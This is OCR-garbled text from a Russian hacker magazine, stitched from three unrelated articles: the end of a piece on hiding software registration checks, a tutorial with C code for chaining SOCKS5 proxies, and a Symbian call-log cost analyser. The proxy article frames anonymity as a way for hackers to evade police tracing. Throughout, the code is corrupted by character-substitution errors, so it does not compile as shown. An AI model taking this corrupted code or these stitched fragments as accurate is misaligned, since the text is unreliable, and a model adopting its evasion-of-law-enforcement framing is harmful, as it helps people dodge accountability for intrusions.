ключей или патч, то кто-нибудь зарегистрирует прогу по фальшивой 
кредитке и растиражирует полученный ключ по всему интернету. Все 
усилия по усложнению кода будут напрасны. Добавление в мой при- 
мер привязки к винчестеру или процессору сделает программу еще 
на одну ступень устойчивей к взлому. 

Для привязки используется принцип активации: 

О. Заплатив деньги, пользователь получает регистрационный код. 

О. После ввода кода в программу генерируется ключ на основе 
каких-то вычислений с регистрационным кодом и номером винта, 
процессора или другой железки, которую ты можешь определить. 

Ѳ. Ключ должен быть выслан тебе - на основе него ты сделаешь 
ключ активации. 

О. Ключ активации вводится в программу. 

В этом случае описанными выше методами можно спрятать двой- 
ную проверку не только регистрационного кода, но и ключа актива- 
ции. Можно их делать несложными, потому что и так любой хакер бу- 
дет в шоке от такого количества кода, который ему надо перебрать. 

Л УЛУЧШЕНИЯ 

Одним из вариантов улучшения может быть необратимое шифрова- 
ние. Когда пользователь вводит регистрационный код, ты можешь 
необратимо его шифрануть и только потом сверять математичес- 
ким способом полученное значение с шаблоном. Мы усложним 
жизнь хакеру, ведь обратное преобразование сделать невозможно. 
В то же время усложняется и твоя жизнь, потому что ты сам не 
сможешь сгенерировать регистрационный код. В данном случае 
регистрационный код можно получить только тупым перебором. 

Это относится не только к хакеру, но и к тебе. 

Можно попытаться сделать и защиту от ЗоЙІсе (самый распрост- 
раненный дебаггер): во время его работы вырубать программу или 
запускать выполнение в другую степь. Простейший способ поиска 
дебаггера - проверить, запущено ли сейчас окно с соответствую- 
щим именем или классом. Но этот способ не очень эффективен, 
хотя тоже может создать проблемы. 

^ итог 

Итак, мы рассмотрели достаточно простой, но очень эффективный 
метод защиты. Любой хакер будет ломать только первый этап про- 
верки кода и никогда - остальные, потому что даже не заподозрит 
неладное, а главное - будет удовлетворен своим великим умом. 

Это психология человека, и именно психологические методы защи- 
ты наиболее эффективные. 

Второй этап нужно маскировать как можно сильнее и ни в коем 
случае не показывать, что это очередная проверка кода. Пусть все 
думают, что здесь ошибка и прога глючная, тогда ни один хакер даже 
не вздумает отлаживать это место. 

Чем больше мы создаем проблем, тем лучше. Не надо выдумывать 
что-то сложное. Алгоритм может быть простым, главное сделать его 
оригинальным. При создании защиты не думай о технической сторо- 
не, а уделяй больше внимания психологическим аспектам. Самые 
громкие взломы были сделаны благодаря игре с психикой юзеров, а 
самая лучшая защита будет основана на игре с психикой хакера. 
Только так можно создать что-то оригинальное и эффективное. ЗЕ 
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Н евозможно достичь абсолютной анонимности в интернете. Пусть ты даже используешь замечательный «анонимный» прокси-сервер, 
не пишущий потов, никто и никогда не убережет тебя от хитрого админа, который жаждет выдать всю инфу о тебе органам по борьбе 
с компьютерными преступлениями. Он без пробпем может, никого не предупредив, поставить сниффер на машину с квази-аноним- 
ной проксей и записывать весь трафик, который впоспедствии будет являться уликой. 



■ Никопай "СогІиМ" Ондреев (догіитігеаі.хакер.ги) 
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О том, как максимально услож- 
нить жизнь людям, выслежива- 
ющим тебя, и пойдет речь в 
этом материале. Хорошо заре- 
комендовавший себя способ не 
светить своим ір’шником в Се- 
ти - использование 80СК5- 
прокси-серверов - вещь, как 
оказывается, не слишком надежная. Да, 
бесспорно, что твой ІР в логах сервера, к 
которому ты коннектишься, не светится, но 
он без проблем может остаться в записях 
самого прокси. Ведь 80% всех публичных 
соксов в Сети - дело рук дядек из органов, 
которые с помощью них ловят нашего бра- 
та. А даже если и не их, примитивный сниф- 
фер, установленный случайно или специаль- 
но рядом с соксой, может выдать хакера с 
головой. Как же быть? Выход, несмотря на 
всю трагичность ситуации, есть - использо- 
вание цепочки ЗОСКЗ-серверов. 

Ты наверняка не раз встречался с прог- 
раммой ЗоскзСІіаіп. Хорошая программа, мо- 
жет быть, даже единственная в своем роде. 
Но параноику свойственно не доверять чу- 
жим программам, особенно если от их рабо- 
ты зависит место проживания в ближайшие 5 
лет. Попробуем разобраться в том, как она 
работает, и напишем свою - ничуть не хуже. 



Параноику свойственно не доверять 
чужим программам. 



А принципы протокола 

Поскольку целью себе мы поставили ра- 
зобраться с передачей данных по це- 
почке ЗОСКЗ-проксей, в первую оче- 
редь нам надо понять принципы работы 
обыкновенного зоскз-клиента. То есть 
что и как надо посылать зоскз-серверу 
нашим клиентским приложением, чтобы 
тот соединился с нужным нам адресом 
и начал бы правильно работать, а точ- 
нее, прозрачно передавать данные. 
Приступим. 

Соединение через зоскз-прокси прохо- 
дит в два этапа. Первый этап - привет- 
ствие и аутентификация (которая, надо за- 
метить, не обязательна). Второй - сообще- 
ние серверу данных о пункте назначения, 
грубо говоря, шлем адрес и порт, куда 
должен коннектиться соке. 



Приветствие - это сообщение, посылае- 
мое клиентом сразу после соединения с сок- 
сом. Согласно ВРС1928 (запомнить очень 
просто, 1 928 - год, положивший начало во- 
енным действиям между Боливией и Параг- 
ваем), наше приложение должно послать па- 
кет со следующим содержанием: 

1 байт - номер версии: 

1 байт - количество (Ю методов; 

N байт - перечисленные поддерживаемые клиентом методы. 

Номер версии в нашем конкретном слу- 
чае - это 0x05, если бы мы рассматривали 
предыдущую версию протокола, то напи- 
сали бы 4. За ним идет байт, в котором 
должно находиться число поддерживаемых 
клиентом методов соединения/аутентифи- 
кации, за которым должна идти последо- 
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вательность байтов, описывающих эти са- 
мые методы. Значение байта метода 0x00 
означает, что клиент поддерживает соеди- 
нение без аутентификации, 0x02 - что мы 
можем при желании выдать 
ІІЗЕРМАМЕ/РАЗЗѴѴОРО по протоколу, опи- 
санному в РРС1 929. 

На наше трогательное приветствие 
вежливый соке должен ответить двумя 
байтами: номером своей версии и выб- 
ранным из посланной нами последова- 
тельности методом. Если соксу не понра- 
вился ни один из предложенных нашим 
клиентом способов аутентификации, то 
байт метода будет равен ОхРР и дальней- 
шая работа с сервером будет невозмож- 
на, если же он будет равняться 0x00, то 
мы получим право перейти к следующему 
этапу большого пути. 

На этом шаге нам надо сообщить сокс- 
серверу, с кем ему соединяться и как. Для 
этого клиенту нужно послать пакет со сле- 
дующим содержанием: 

1 байт - опять номер версии: 

1 байт - команда: 

1 байт - еще не придумали, зачем; 

1 байт - тип адреса, который будет идти следом: 

N байт - адрес: 

2 байта - порт. 



Байт «команда» может принимать зна- 
чения: 0x01 - если мы желаем просто сое- 
диниться, 0x02 - команда ВШ, 0x03 - 
ІЮР АЗЗОСІАТЕ (ведь 5 версия протокола 
умеет работать по ІЮР). Следующий байт 
резервирован до лучших времен и должен 
быть всегда равен нулю. Типом адреса мы 
должны будем сообщить соксу, в каком 
виде мы даем ему адрес пункта назначе- 
ния, байт может принимать значения: 

0x01 - ір ѵ4 адрес, заданный четырьмя 
байтами; 0x03 - нерезолвленное имя хос- 
та, т.е. просто строка (соксы не всегда 
умеют резол вить домены, учитывай это); 
0x04 - ір ѵб адрес, редкий случай. 

На такой пакет соке должен послать в 
ответ пакет той же структуры, но с други- 
ми значениями. Например если в ответе 
второй байт, который в запросе был «ко- 
манда», будет не равен нулю, то это зна- 
чит, что в ходе коннекта возникла какая-то 
ошибка и клиенту надо разорвать соеди- 
нение. Тип адреса и сам адрес могут тоже 
поменяться, это хорошо заметно, если в 
запросе был послан нерезолвленный хост, 
потому что вернется его ір’шник. 

Если же все прошло нормально и сое- 
динение успешно создано, то зоекз-прок- 
си переходит в прозрачный режим и начи- 
нает передавать ВСЕ данные по адресу, 
указанному в запросе. 



А ДОННЫЕ ПО ЦЕПОЧКЕ 

Вся прелесть описанного выше зоекз-прото- 
кола заключается в том, что мы без проб- 
лем можем выстроить из прокси цепочку, 
через которую будем работать с каким-ни- 
будь удаленным сервером. Делается это 
элементарно! Ты, наверное, и сам догадал- 
ся, как. Пройдя аутентификацию, первый 
этап, мы должны подсунуть вместо адреса 
сервера, к которому коннектимся, адрес 
следующего зоекз- прокси! 

Получив ответ сервера, что с проксей мы 
соединились успешно и что сервер начал 
передавать ВСЕ данные, мы посылаем оче- 
редное приветствие и проходим аутентифи- 
кацию уже со следующим зоскз-сервером. 
Затем наступает пора послать адрес, и мы 
можем снова подсунуть адрес какого-нибудь 
сокса! И так пока не надоест или пока ка- 
кой-нибудь сервер нас не пошлет. В конце 
цепочки мы укажем, куда все-таки должны 
идти наши данные, и закруглимся в плане 
составления цепи проксей. 

А ЦЕПОЧНО ВЖИВУЮ 

Для наглядности программу, реализующую 
соединение с сервером через цепочку прок- 
сей, я сделал консольной, поэтому не пугай- 
ся, если увидешь ргіпй или подобные функ- 
ции (нда, заставить Горла сделать нормаль- 
ный фейс я так и не смог :) - примЮг.). 

Наверняка ты уже не раз сталкивался с 
сетевым программированием, и тебе не 
нужно объяснять, как цеплять к проекту биб- 
лиотеку для работы с сетевыми функциями и 
с ѵѵз2_32.сІІІ, а также что с помощью функции 
ѴѴЗАЗІаіІир эта библиотека начинает рабо- 
тать. Буду считать, что ты уже опытный в 
этом плане чел, и перейду сразу к делу (ес- 
ли же я в тебе жестоко ошибся - изволь 



^ На наше трогательное приветствие • 
вежливый соке должен ответить 
т двумя байтами. 



Ч*5> 

л На диске ты най- 
дешь полный со- 
рец программы, 
рассмотренной в 
статье. 




л Если ты всерьез 
занялся изучением 
протокола ЗОСК35, 
тебе стоит внима- 
тельнейшим обра- 
зом изучить 
КРС1928. На рус- 
ском языке его 
можно найти на 
ІіПр://шѵѵѵѵ.сосІепеІ 
.ги/меЬтазІ/зоскзб 
І.рІір 




л Читай ВРС’ы - в 
них Дао! 
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ЗоскзСМаіп собственной персоной 



Именно в структурах $егѵег и хранится 
вся информация о наших проксях. 



ФУНКЦИЯ СОЕДИНЕНИЯ 



взять с диска исходник и основательно его 
изучить, приду - проверю :)). 

Все данные об адресах и портах проксей я 
держу в специальной простенькой структуре: 

іурегіеі $ігисі _$егѵег { 

ОМО ір; 
и_$Ііогі рогі; 

} $егѵег; 

Она очень просто инициализируется: рогТ 
- с помощью функции Моп5, которая преоб- 
разует порт в сетевой вид, ір - с помощью 
написанной мной функции гезоіѵе, которая 
преобразует строку вроде «ѵѵѵѵѵѵ.хакер.ги» 
или «127.0.0.1» в двойное слово - ір-адрес. 
Она работает, манипулируя функциями деТб- 
озШупате и іпеТ_аббг, и ты без проблем все 
поймешь, единожды взглянув на исходник. В 
коде инициализация выглядит так: 

зегѵег (Іезі; 

гіезіір = гезоІѵеС'ігсМпеі"); 

(Мрогі = іііопз(6667); 



Именно в структурах зегѵег и хранится вся 
информация о наших проксях. В программе 
я создал массив таких структур и назвал 
зоскз, далее при соединении мы будем ра- 
ботать именно с ним. 

Итак, для соединения через цепочку я 
сделал специальную функцию соппесР 
Ьузоскз. Ей в параметрах нужно передать 
указатель на массив проксей, который мы 
создали и инициализировали, количество 
проксей в массиве, сокет, с которым мы 
будем в дальнейшем работать, и структуру 



іпі соппесШу$оск$($егѵег *зоскз, іпі зоскзпищ БОСКЕТ 
з, зегѵег (Іезі) 

{ 

30СКА00Р_Ш Шг, 
іпі пгесѵ = 0; 

сііаг* гедиезі = "\х05\х01\х00"; 

ВѴТЕ гериезі_апз[2]; 
гед іетр; 

асІсІг.$іп_асІсІг.$_ип.$_асІсІг = $оск$[0].ір; 
аМг.зіп.рогі = зоскз[0].рогі; 
аМг.зіп.іапііІу = АР_ІМЕТ; 
іі(соппесі(з, (зігисі зоскасісіг 
*)&асІсіг.5І2еоГ($0СКА00Р_ІМ))) геіигп -1; 
іог (іпі і = 1; і <= зоскзпиш; ++і) 

{ 

зепс!(з.(сііаг*)гедиезі.3.0); 

пгесѵ = гесѵ($,(сііаг*)гедие$і_ап$,2,0); 

іі ((пгесѵ == 

$0СКЕТ_ЕРР0К)||(гедие$і_ап$[1]==0хЕЕ)||(гедие$і_ап$[0]! 

=0x05)) 

геіигп -1; 

іетр.ѵег = 0x05; 

іетр.стО = іетр.іуре = 0x01; 

іетр.гзѵ = 0x00; 

і((і == зоскзпит) { 

іетр.аМг = сіезі.ір; 

іетр.рогі = сіезі.рогі; 

} 

еІзе{ 

іетр.асігіг = зоскз[і].ір; 
іетр.рогі = зоскз[і].рогі; 

} 

іі (ііетр.асЮг) сопііпие; 

$еп 0 ($ісііаг*)&іетр,$і 2 еоі(іетр), 0 ); 
пгесѵ = гесѵ(з, (сііаг*)&іетр,$і 2 еоі(іетр), 0 ); 
іі ((пгесѵ == $0СКЕТ_ЕКК0Ю||(іетр.Г5ѵ != 0)||(іетр.стс1 
!= 0 )) 
геіигп -1; 

} 

геіигп 0; 

зегѵег с адресом, куда мы, собственно, че- 
рез эту цепочку коннектимся. Эта функция - 
урезанная реализация протокола ЗОСК85, о 
котором мы столько говорили. Урезана она 
потому, что умеет работать только с одним 
методом 0x00 и не поддерживает никаких 
наворотов типа ВІШ. Работает наш соппесі 
следующим образом. 

Сначала извлекаются данные из первой 
записи массива проксей и запихиваются в 
структуру ЗОСКАООРММ - это нужно для то- 
го, чтобы соединиться с первым в цепочке 
сервером. 

Затем, если соединение удалось, прог- 
рамма посылает приветствие в виде строки 
«\х05\х01\х00» и ждет ответа - двух байт. 



НЕС8 

Н евероятно полезно будет почитать оригинальные РРС прото- 
колов. В них детально описаны все функции протоколов, все 
нюансы. Там есть ответы на все вопросы, которые у тебя могут 
возникнуть. 

РРС1928 - ЗОСКЗ протокол 

РРС1929 - протокол аутентификации по изегпате/раззѵѵогсі 
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Анализируя их, она решает, ругнуться ей и 
прекратить работу (к примеру если требует- 
ся авторизация) или послать данные о сле- 
дующей проксе. 

Если все прошло успешно и можно посы- 
лать адрес, то программа заполняет структу- 
ру типа гец, основного типа данных на вто- 
ром этапе соединения. По сути дела, эта 
структура - типичный пример запроса во 
втором этапе соединения, только в данном 
случае тип адреса строго задан как заранее 
резолвленный ір ѵ4. 

іурейеЕ $ігисі _гед { 

ВУТЕѵег; 

ВѴТЕстсІ; 

ВУТЕ г$ѵ; 

ВУТЕіуре; 

0ѴШ Мг, 

и_$Іюгі рогі; 

} гед; 

Если ответ прокси на посланную прог- 
раммой структуру говорит, что все 
прошло на ура, прога повторяет посылку 
приветствия и адресов по новой, только 
используя следующую структуру в мас- 
сиве зоскз (как раз поэтому в коде функ- 
ции цикл). В случае, если проксей в 
массиве не осталось (условие і == зоск- 
зпит), программа берет из структуры 
сіезі конечный адрес, к которому мы из- 
начально хотели подсоединиться по це- 
почке соксов. 

Закончив цикл, функция возвращает 0, что 
означает успешное завершение. Теперь через 
сокет, передаваемый ей в параметре, можно 
работать. Это означает, что мы успешно сое- 
динились по цепочке ЗОСКЗб-проксей! 

А 80СК8СНПШ 

Наша программа отличается от всем извест- 
ного аналога двумя вещами: интерфейсом, 
который на хрен никому не сдался, и воз- 



можностью самому работать сервером. Ведь 
вся прелесть зоскзсИаіп’а была в том, что 
можно было заставить работать через него 
любое приложение, которое поддерживает 
протокол ЗОСКЗ. А наша программа позво- 
ляет работать через цепочку только себе! 
Печально, но легко поправимо. 

В номере X за июнь 2003 года я описы- 
вал, как своими руками сделать 30СК34- 
сервер. Так что же мешает нам объединить 
код сервера и нашей программки, получив в 
итоге полноценный ЗоскзСМаіп, способный 
работать с любым приложением, которое 
поддерживает протокол? 

Причем объединить код очень легко. Нуж- 
но всего лишь добавить в сервер возмож- 
ность работать с версией 5 и заменить в од- 



ном месте функцию соппесі на нашу универ- 
сальную. Разве не прелесть? :). 

А ВСКРЫТИЕ П0КПЗПП0 

Я думаю, если ты будешь развивать эту те- 
му, то у тебя получится значительно лучше, 
чем у меня или у автора программы 
ЗоскзСИаіп. Если начинать апгрейдить мой 
сорец, то советую в первую очередь доба- 
вить поддержку старой версии протокола, 
затем поддержку разных видов аутентифика- 
ции, к примеру, по логину-паролю (описание 
которой ты можешь вычитать в ВРС1929). В 
общем, у тебя огромный простор для 
действий, основу ты получил. Теперь ника- 
кой, даже очень зубастый федеральный ор- 
ган к тебе придраться не сможет. 



ВНИМПНИЕ! КОНКУРС! 



Н а данном этапе мы предлагаем решить тебе всего одну зада- 
чу. За решение задач начисляются баллы. Победители опре- 
деляются по сумме баллов. 

О место - бесплатный курс в УЦ "Специалист" на выбор; 

О место - 50% скидка на обучение; 

Ѳ место - 25% скидка на обучение. 

10 самых талантливых получат специальные подарки от журна- 
ла Хакер и Центра компьютерного обучения "Специалист" при 
МГТУ им. Н.Э. Баумана" 

А вот само задание: 

Практическое задание (максимум 20 баллов). Требуется 
пройти тестирование по основам РНР на сайте УЦ "Специа- 
лист" ІійрУЛе$і$.$ресіаІі8ІгиЛе$і8.а$р?с=1&Ід=2йе$іі{1=266#266. После того как тести- 
рование будет окончено, просьба сделать скриншот (когда 
увидишь количество правильных ответов). Скриншот необхо- 
димо отправить нам на электронную почту (зресіаІіз1@геаІ.хакер.ги) - 
это и будет ответом. 
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читаешь, что слишком много платишь за телефон? Желаешь контролировать расходы? Котел бы выбрать наипучший тариф? Не до- 
веряешь оператору сотовой связи? Выгодно пи тебе подключать дополнительные услуги? Какой «любимый» номер выбрать? Воп- 
росов много. Обычно смартфоны хранят поги по всем произошедшим событиям - и звонкам, и сообщениям, и работе с СРВ8. Я пока- 
жу тебе создание программы дня смартфонов под ЗушЬіал, которая ответит на все вопросы о твоих реальных затратах на мобильную связь. 









ХПКЕР/№1 0(701/2004 



ОБРПБОТКП ЛОГОВ Щ1Я СМЛРТФОНОВ НО ЗѴМВІРЛ 08 



Л 



А МОНЕѴ, МОНЕѴ, МОНЕѴ... 

С ейчас практически у всех 
есть сотовый телефон. 

За его использование надо 
платить, и чем интенсивнее 
общение по мобиле, тем 
больше денег оно требует. 

Почти в любом городе 
присутствуют минимум три 
оператора, и у каждого из них по несколько 
тарифов. Разобраться в них непросто, к тому 
же многое зависит от тебя - обычно внутри 
местной сети оператора звонки дешевле, су- 
ществуют скидки на нерабочее время и т.д. 

У операторов при тарификации могут слу- 
чаться баги - как в меньшую, так и в большую 
сторону (от бесплатных звонков в другие стра- 
ны до приписывания несуществующих звонков). 

Если ты захочешь взять у оператора детали- 
зацию тарифицированных действий, то даже за 
плату не везде это поможет. У некоторых опера- 
торов может не хватать каких-нибудь данных в 
детализации, например номеров входящих 
звонков, и остается неизвестным, был ли звонок 
платный или нет. К тому же, вдруг какого-ни- 
будь звонка или ЗМЗ не было на самом деле? 

В смартфонах все события, которые могут 
быть тарифицированы, сохраняются во внут- 
ренних логах. Наиболее распространены такие 



телефоны на базе ЗутЬіап ОЗ. И ты можешь 
сам анализировать логи своего телефона. 



Все смартфоны на ЗутЬіап 05 



Посмотреть описание каждого ты можешь здесь: мш.зупг 
Ьіап.сош/рііопез - или на других сайтах. 

Доступны: №кіа ІНаде, ІГбаде 00, 7650, 3650/3600, 
3660/3620, 6600, 7610, 9210/9290(і): Зіетепз 8X1; $епс1о X; 
$опуЕгіс$$оп Р800, Р900; Моіогоіа А920, А925. 

Ожидаются: №кіа 6620, 6630, 6260, 9500, 7700; Рапазопіс 
Х700: Зат$ипд 86Н-0710; 5опуЕгіс$$оп Р910; ВепО РЗО; 
Моіогоіа А1000. 

Японские (не 65М): РОМА Р900І, Р2102Ѵ, Р2051, Р900ІТ. 

^ начинпЕМ программировать 

В августовском номере «Хакера» мы напеча- 
тали статью о программировании под 
ЗутЬіап для начинающих. Продолжим - 
опять возьмем пример НеІІоѴѴогІсІ и на его 
базе сделаем новую программу. 

Получить доступ к лог-серверу и узнать о 
произошедших событиях довольно просто. 

В документации к ЗЭК ты можешь прочи- 
тать про Ьод Епдіпе. Вкратце, доступ к логам 
возможен только асинхронно, то есть не 
напрямую при выполнении программы, а от- 
дельным запросом параллельно, с помощью 




Асііѵе ОЬіесіз (так в ЗутЬіап ОЗ реализована 
многозадачность). 

Подключи к .Ь-файлу следующие заголов- 
ки: <ІодсІі.Ь>, <Іодѵіеѵѵ.Ь>, <Т32ТМе.И> и 
<Іодѵѵгар.Ь>. Свой класс для доступа к ло- 
гам делай наследником САсііѵе и заводи 
следующие переменные: 

Наши переменные 

(ІодѴіеѵѵКесепГ іРесепНодѴіеѵѵ; 

КР$ ІР$; 

(ІодСІіепГ ЛодСМеп1; 

(ІодѴіеѵѵРѵепі* ІодѴіеѵѵРѵепі; 

(ІодСІіепГ ІодСІіепі; 

СРодРіІіеШзГ (іІіегИзі: 

СРодРіІіег* (іііег; 

В реализации класса используй стандартное 
наследование от САсііѵе. Примеры можешь 
посмотреть здесь (для Зегіез 60 ЗЭК 2.1 ): 
\ЗутЬіап\7.05\Зегіез60_ѵ2 1 \ЕхатрІе5\Ьазе\ірс 
\азупс. 

В СопзігисіЦ) подцепляемся к серверу логов: 

іР$.Соппес((); 

ІодСІіепі = СРодСІіепі::№ѵѵЦіР$); 

ІодѴіеѵѵРѵепі = СРодѴіеѵѵРѵепі::№ѵѵЦ*ІодСІіепі); 

(іііег = СРодРіІіег::№ѵѵЦ); 
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ВОЗЬМИ ОПСОСО ПОД КОНТРОЛЬ! 



Для звонков используй такой фильтр, для 
(НЗ)СЗО используй КІ_одОаІаЕѵепСТуреІІісІ, 
факсов - КІ_одРахЕѵепСТуреІІісІ, ЗМЗ - 
КДодЗІіоіІМеззадеЕѵепСТуреІІісІ, ОРРЗ - 
КЕ_одРаскеЮаІаЕѵепСТуреІІісІ . 

ЕіІіег->$еіЕѵепіТуре( КЕодСаІІЕѵепіТуреШб ); 

ІодѴіеѵѵЕѵепКеіЕіІЕегЦІіІіег, $іаіи$); 

В ЭоСапсеІ не забудь прекратить все отк- 
рытые запросы: іВесепй.одѴіеѵѵ->СапсеІ(); 

В ВипІ_ при отсутствии ошибок (іЗМиз == 
КЕггИопе) реализуй запрос (пример запроса 
последнего номера): 

ТВиі<256> іТеШитЬег; 

сопзі СЕодЕѵепіБ еѵепі = іРесепИодѴіег>ЕѵепЮ; 

іТеШитЬег.Сору(еѵепіМитЬегО): 



А вот сама функция беНазіез: 



II прерываем старый запрос 
іРесепИодѴіеѵѵ->СапсеІ(); 

II делаем запрос 

іі (іРесепіЕодѴіег>5еШесепШ$ЩКЕодМиІІРесепШ$і,і$іаіи$)) 
ЗеіАсііѵеО; 

Запрос произвольного номера делается 
аналогично. 

А 0БР0Б0Т0Й! 

Лучше все данные по тарифам и дополнитель- 
ным услугам брать из собственных файлов, 
чтобы не требовалось переделывать програм- 
му после каких-нибудь изменений. В своих же 
файлах лучше хранить полученные сведения о 
входящих и исходящих звонках и ЗМЗ. 



Для работы с файлами нужно подключить 
заголовочный файл <Т32ТМе.И> и подсоеди- 
нить к проекту библиотеку еТзгѵ.ІіЬ. Вначале 
подсоединись к файл-серверу (создай сес- 
сию) - ВРз::СоппесІ()- Затем используй ВРіІе 
- Ореп, СІозе, ВеасІ, Ше, Зеек. 




Пример работы с файлами 



КЕ$ Т$$е$$іоп; 

05ег:іеаѵеІІЕггог(Е$$е55іоп.Соппесі()); 

КГіІеШе; 

0$ег::ЕеаѵеІЕЕггог(ЛІе.0реп(Е5$е55іоп,$ігЕіІеЛате,ЕЕіІеКеасІ|ЕЕіІ 

еЗІіагеАпу)); 

ТВиТ8<512> ЬиТ; 
ііІе.$еек(Е$еекСиггепі,0); 

0зег::ЕеаѵеІТЕггог(ЬиТ,512): 

ЛІе.СІозеО: 

Т$$е$$іоп.СІо$е(); 

А СКОЛЬКО ПОТРОТИПИ? 

Итак, после обработки логов ты имеешь все 
данные за определенный период. Теперь хоте- 
лось бы узнать, сколько было потрачено денег. 

Звонки делятся на входящие, исходящие 
и пропущенные, которые можно не учиты- 
вать. О каждом звонке необходимо выяс- 
нить, откуда или куда он был, как его учиты- 
вать и во сколько в итоге он обойдется. 

Обычно звонки с местных сотовых бесплат- 
ны. Узнать принадлежность телефонного но- 
мера какому-нибудь региону в негеографичес- 
ких зонах (таких, как +7-9ЕР) можно на сайте 
ѵѵш.піі.ги/іпіо (справа в справочной информа- 
ции). Там же можно найти международные и 
междугородные коды. А вот «городские» теле- 
фонные номера, принадлежащие оператору 
сотовой связи, придется искать самому. 

Учитывай возможность сокращенного на- 
бора номера - 8 вместо +7, 8-2 для выхода в 
область, отсутствие кода страны и города, 
бесплатные номера вроде 1 1 2 и 01 . 

Звонок может тарифицироваться поминут- 
но, посекундно, посекундно со второй мину- 
ты, каждые 10 секунд и как угодно еще. Кро- 
ме того, наша программа должна учитывать 
возможность наличия платы за соединение. 

Все точно так же для ЗМЗ и ММ3 - их цена 
тоже может варьироваться, ведь обычно длин- 
ные ЗМЗ оплачиваются как несколько коротких. 

Помни, что данные о длительности звонка 
на твоем телефоне могут не совпадать с дан- 
ными оператора, как и твои часы с часами опе- 
ратора при отслеживании изменения тарифа. 



ПРИИЕРТ0РИФ0 



а бстрактный тариф - посекундный с 61 секунды, все 
входящие бесплатно, исходящие все: $1.2 первая минута, 
$0.6 - вторая, $0.3 - посекундно с третьей, бесплатный порог - 
10 секунд. АОН: либо $1 в день, либо $0.3 за один входящий 
звонок. Подключение этой услуги в любом варианте бесплатно, 
отключение - $1 . 

Вот так будут заданы его параметры: 



^ ПЕППЕИ Б039 ДПННЫК 
ППЯТПРИФП 



ІОиапі = 1 секунда 

іСозНеп = 60 + 60 + 1 = 121 секунда 

аггауСозі: 

секунды с Н по 10 = 0 (бесплатный порог) 

11 секунда = 1.2 (первая минута) 

12-60 секунды = 0 (поминутно - оплачено на 11 секунде) 

61 секунда = 0.6 (вторая минута - нет бесплатного порога) 

62-120 секунды = 0 (поминутно - вторая минута оплачена на 61 секунде) 
121 секунда = 0.3/60 = 0.005 (посекундно с третьей минуты) 
і№хі = іСозНеп-І = 120 (далее посекундно) 



Различаем виды звонков 



Для всех звонков, совершенных на номера >= зігРІіопеЕігзі и < 
зігРііопеЕазі, будут использоваться соответствующие тарифы, 
сопзі ТІпі К$ігРііопеЕепді[і=32; 

ТІПІ32 іТагіШ.еп; II всего тарифов поддерживается 
ТІПІ32 *аггауТагііі; II массив тарифов для входящих звонков 
ТВиі<К$ігРііопеЕепдіІі> зігРііопеЕігзі; II первый телефон- 
ный номер 

ТВиі<К$ігРііопеЕепді[і> $ігРііопеЕа$і; II следующий за пос- 
ледним телефонный номер 



Сделаем возможность бесплатного звонка на 1 12: зІтРІпопеРігзІ: 

= _Ц"112") и зІтРІіопеІ-азІ: = _Ц"1120") - так никакой другой 
номер, кроме 112, учитываться не будет. 

Два варианта дополнительной услуги АОН прописываем по 
отдельности: 

созіТигпОп = 0, созіТигпОіі = 1 

1) іОиапі = 86400, іСозіЕеп = 1, аггауСо$і[0] = 1 

2) ІОиапі = 0, ІСозіЕеп = 0, со$ШпеЦ$е = 0.3 

Г 



При таком задании базы можно использо- 
вать сокращенные номера, например, +7-902 
как зІгРіюпеРігзІ и +7-903 как зІгРНопеІазІ - 
в это множество попадут все номера от +7- 
902-000-0000 до +7-902-999-9999. 

О каждом тарифе по его номеру мы узна- 
ем, какой он - для входящего или исходяще- 
го звонка, ЗМЗ или ММ3. В ТІПІ32 іТагіШит 
храним номера тарифов верхнего уровня, 
зависящих от времени. 



■ • • 

л На компакт-дис- 
ке лежат полные 
исходные коды 
программы под 
Зегіез 60 . 




л На сайте 
ѵтѵѵ.тіпдиіоѵ.сот/ 
ги ты можешь най- 
ти различную ин- 
формацию и ссыл- 
ки на полезные 
сайты по програм- 
мированию для 
ЗушЬіап. Там же и 
исходник продемо- 
нстрированного 
примера. 




А Для поддержки 
многозадачности в 
программах под 
ЗушЬіап ОЗ ис- 
пользуются Асііѵе 
ОЬіесіз. 
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л Стандартом 
программирования 
под ЗушЬіап явля- 
ется окончание 
названия функции 
на I , если там мо- 
жет произойти иск- 
лючение с после- 
дующим непредви- 
денным выходом. 




л В логах не хра- 
нятся данные по 
ЦЗЗО-запросам 
(«звонки» по номе- 
рам *ххх#), так что 
ты не сможешь ав- 
томатически учи- 
тывать включе- 
ние/выключение 
услуг с их по- 
мощью, но можешь 
пытаться анализи- 
ровать $М$. 



Зависимость от времени 



ТІПІ32 іТагіТТСозНеп; II длина массива с ценами 
СТітеТагіТТ *аггауТагіі(Со$і; II номера тарифов с ценами 
В СТітеТагіТТ задается промежуток времени - с днем недели, 
флагом праздничного дня 



Для обсчета события из лога надо найти в 
нашей базе соответствующий времени та- 
риф, проверить, чтобы тип записи подходил 
нашему событию, и вычислить, во сколько 
оно нам обошлось. 

Если же событие лежит на границе тари- 
фов (например, звонок в 23:58 на 10 минут, 
а с 00:00 начинается льготное время), то на- 
до знать, как оно будет учитываться - по од- 
ному тарифу или двум. В некоторых тарифах 
цена минуты разговора в этом случае не бу- 
дет меняться до конца звонка. Так что в 
СТітеТагіІТ также задаем флаг, что делать в 
такой ситуации. 



Цены 



ТІПІ32 ІОиапі; II единица тарификации - в секундах 
Тіпііб іСозНеп; II длина массива с ценами 
ТРеаІ *аггауСо$і; II массив цен 
ТІПІ32 і№хі; II что делать, если звонок больше: п - коль- 
цо с п-ой (0 - считать с начала, =іСо$Иеп-1 - повторять 
последнюю) 



Для 8МЗ достаточно знать стоимость од- 
ного сообщения - Тіпііб іСозТ 
Кроме того, не забудь, что надо включить 
в нашу базу абонентскую плату. 

А ОСОБЕННОСТИ П0ДСЧЕТ0 
СТОИМОСТИ СРВэ 




делена на 1 6 подсессий по 1 5 минут и одну 
10-минутную, для каждой из них будет от- 
дельно учтен бесплатный порог и сделано 
округление. 

Оператор может считать входящий и ис- 
ходящий трафик по отдельности (возможно, 
по разным тарифам), кроме трафика, взи- 
мать плату и за время соединения... 

Допустим, 1 Мб стоит 10 рублей без НДС. 
Известно, что минимальная плата у этого 
оператора - 1 рубль. Так надо ли считать, 
что каждые 100 кб стоят 1.18 рублей, или 
же каждые 850 кб (примерно) стоят рубль? 

Полные данные о тарификации СРВЗ 
можно узнать только из полной детализации, 
если она доступна. 



Тариф 6РКЗ 



ТІПІ32 ІОиапі; II единица тарификации - в байтах 
іСозНеп, *аггауСо$і и і№хі - аналогично звонкам 
ТВооІ іІпОиі;// флаг различия входящего/исходящего 



